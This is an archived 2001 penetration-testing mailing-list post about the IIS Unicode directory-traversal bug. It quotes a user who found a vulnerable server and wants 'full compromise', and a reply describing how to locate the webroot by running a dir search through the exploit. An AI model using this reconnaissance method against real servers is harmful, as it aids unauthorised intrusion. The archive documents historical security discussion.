Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

how to upload some file on IIS server with unicode bug

From: "Tran Le Minh" <tranleminh2001 () yahoo com>
Date: Fri, 15 Jun 2001 08:32:41 +0700

----- Original Message ----- 
From: "Jay D. Dyson" <jdyson () treachery net>
To: "Penetration Testers" <pen-test () securityfocus com>
Sent: Friday, June 15, 2001 12:31 AM
Subject: Re: finding webroot on IIS


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Jun 2001, * wrote:


Recently i came across an IIS webserver that i found to be vulnerable to
the Unicode attacks. However, i cannot determine the webroot of this
drive, and therefore i am having troubles reaching a full comprimise. 
The directory "C:\Inetpub" exists, but the only contents of this
directory is the folder "mailroot". 

Additionally, when i connect and request the root document (ie GET / ),
it returns the string: "<% Response.ContentType = "text/plain" %> HELLO" 

Does anyone come across anything like this before, and what would be the
simplest method of determining the webroot? 


If you're exploiting via the Unicode attack, then it's just a
matter of finding a known quantity.  The hamfisted way will do in a pinch; 
namely this: 

1. Find a page by browsing for a sufficiently unique page
name (foobar.htm). 

2. Via the Unicode exploit, run this command:
dir DRIVE:\foobar.htm /s
(where DRIVE is the drive letter; usually C and/or D)

The IIS system will gleefully return its location.

- -Jay

  (    (                                                         _______
  ))   ))   .-"There's always time for a good cup of coffee."-.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson - jdyson () treachery net ------<) |    = |-'
 `--' `--'  `--- Every day's a Friday when you have a gun. ---'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBOyjm2tCClfiU/BIVAQGRLgP/VxyGAGwuIApdktgiaQ/vTxyIyeJIpOuq
xjXexp30UCn1b8b141ZiW3QzRZPcYv7jqOy1h/5uh8GTsx4u4b8H1SE5KSuUcsqF
MJg/YgxRr1YT1WAx+VVUjeh5a2cgwkeVbeacfbub4RLTqQ1Rv2oZGNa46Zwg+YBD
hHZqn0Ebl38=
=MUu1
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: